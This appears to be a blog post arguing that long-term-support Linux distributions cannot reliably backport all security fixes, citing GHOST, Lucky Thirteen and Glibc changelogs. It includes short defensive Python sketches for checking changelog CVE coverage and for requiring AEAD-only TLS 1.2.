So you probably see my point: There is a very chaotic stream of information in various different places about bugs and vulnerabilities in free software projects. The number of vulnerabilities is huge. Making a promise that you will scan all this information for security vulnerabilities and backport the patches to your operating system is a big promise. And I doubt anyone can fulfill that.



GHOST is a single example, so you might ask how often these things happen. At some point right after GHOST became public this excerpt from the Debian Glibc changelog caught my attention (excuse the bad quality, had to take the image from Twitter because I was unable to find that changelog on Debian's webpages):

What you can see here: While Debian fixed GHOST (which is CVE-2015-0235) they also fixed CVE-2012-6656 – a security issue from 2012. Admittedly this is a minor issue, but it's a vulnerability nevertheless. A quick look at the Debian changelog of Chromium both in squeeze and wheezy will tell you that they aren't fixing all the recent security issues in it. (Debian already had discussions about removing Chromium and in Wheezy they don't stick to a single version.)

It would be an interesting (and time consuming) project to take a package like PHP and check for all the security vulnerabilities whether they are fixed in the latest packages in Debian Squeeze/Wheezy, all Red Hat Enterprise versions and other long term support systems. PHP is probably more interesting than browsers, because the high profile targets for these vulnerabilities are servers. What worries me: I'm pretty sure some people already do that. They just won't tell you and me, instead they'll write their exploits and sell them to repressive governments or botnet operators.
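A first, very rough step of such a project could look like the following Python sketch: extract all CVE ids mentioned in a package changelog and compare them against a list of known vulnerabilities. Everything here is illustrative. The function names are made up, the changelog excerpt is a hypothetical stand-in (only the two CVE ids come from the Debian example above), and `CVE-0000-0000` is a placeholder, not a real id. A missing id does not prove that a bug is unfixed, since fixes are often backported without mentioning a CVE, so the result is only a list of candidates for manual review.

```python
import re

# CVE ids have the form CVE-<year>-<number with at least four digits>.
CVE_PATTERN = re.compile(r"CVE-\d{4}-\d{4,}")


def cves_mentioned(changelog: str) -> set:
    """Return all CVE ids that appear anywhere in the changelog text."""
    return set(CVE_PATTERN.findall(changelog))


def possibly_unfixed(known: set, changelog: str) -> list:
    """Known CVE ids that the changelog never mentions, sorted."""
    return sorted(known - cves_mentioned(changelog))


# Hypothetical changelog excerpt, not the real Debian text.
SAMPLE_CHANGELOG = """\
  * Add patch for CVE-2015-0235 (GHOST).
  * Add patch for CVE-2012-6656.
"""

# CVE-0000-0000 is a placeholder standing in for "some other known issue".
KNOWN_CVES = {"CVE-2015-0235", "CVE-2012-6656", "CVE-0000-0000"}

if __name__ == "__main__":
    for cve in possibly_unfixed(KNOWN_CVES, SAMPLE_CHANGELOG):
        print("needs manual review:", cve)
```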

Then there are also stories like this: Tavis Ormandy reported a security issue in Glibc in 2012 and the people from Google's Project Zero went to great lengths to show that it is actually exploitable. Reading the Glibc bug report you can learn that this was already reported in 2005(!), just nobody noticed back then that it was a security issue and it was minor enough that nobody cared to fix it.

There are also bugs that require changes so big that backporting them is essentially impossible. In the TLS world a lot of protocol bugs have been highlighted in recent years. Take Lucky Thirteen for example. It is a timing sidechannel in the way the TLS protocol combines the CBC encryption, padding and authentication. I like to mention this bug because it is the TLS bug that was already mentioned in the specification (RFC 5246, page 23: "This leaves a small timing channel"). The real fix for Lucky Thirteen is not to use the error-prone CBC mode any more and switch to authenticated encryption modes, which are part of TLS 1.2. (There's another possible fix which is using Encrypt-then-MAC, but it is hardly deployed.) Up until recently most encryption libraries didn't support TLS 1.2. Debian Squeeze and Red Hat Enterprise 5 ship OpenSSL versions that only support TLS 1.0. There is no trivial patch that could be backported, because this is a huge change. What they likely backported are workarounds that avoid the timing channel. This will stop the attack, but it is not a very good fix, because it keeps the problematic old protocol and will force others to stay compatible with it.
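On a system with a current TLS library, the "real fix" is a matter of configuration. The following Python sketch shows one way to build a client context that requires at least TLS 1.2 and only offers authenticated encryption (AEAD) cipher suites. The function name is made up and the cipher string is one possible choice, not a recommendation from this post. It obviously doesn't help on systems whose OpenSSL only speaks TLS 1.0, which is exactly the backporting problem.

```python
import ssl


def make_aead_only_context() -> ssl.SSLContext:
    """Client context without CBC suites: TLS 1.2 or later, AEAD only."""
    ctx = ssl.create_default_context()
    # Refuse TLS 1.0 and 1.1, which only offer CBC or RC4 based suites.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # OpenSSL cipher string limiting TLS 1.2 to AES-GCM and ChaCha20-Poly1305
    # with ephemeral ECDH key exchange. TLS 1.3 suites are configured
    # separately by OpenSSL and are all AEAD anyway.
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20")
    return ctx


if __name__ == "__main__":
    for cipher in make_aead_only_context().get_ciphers():
        print(cipher["protocol"], cipher["name"])
```

The price of such a configuration is the compatibility problem described above: servers that only support TLS 1.0 or CBC suites can no longer be reached.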

LTS and stable distributions are there for a reason

The big question is of course what to do about it. OpenBSD developer Ted Unangst wrote a blog post yesterday titled Long term support considered harmful, I suggest you read it. He argues that we should get rid of long term support completely and urge users to upgrade more often. OpenBSD has a 6 month release cycle and supports two releases, so one version gets supported for one year.

Given what I wrote before you may think that I agree with him, but I don't. While I personally always avoided using systems that are too old (I'm usually using Gentoo, which doesn't have any snapshot releases at all and does rolling releases), I can see the value in long term support releases. There are a lot of systems out there, connected to the Internet, that are never updated. Taking away the option to install systems and let them run with relatively little maintenance overhead over several years will probably result in more systems never receiving any security updates. With all its imperfections, running a Debian Squeeze with the latest updates is certainly better than running an operating system from 2011 that stopped getting security fixes in 2012.

Improving the information flow

I don't think there is a silver bullet solution, but I think there are things we can do to improve the situation. What could be done is to coordinate and share the work. Debian, Red Hat and other distributions with stable/LTS versions could agree that their next versions are based on a specific Glibc version and they collaboratively work on providing patch sets to fix all the vulnerabilities in it. This already happens to some extent with upstream projects providing long term support versions, the Linux kernel does that for example. Doing that at scale would require vast organizational changes in the Linux distributions. They would have to agree on a roughly common timescale to start their stable versions.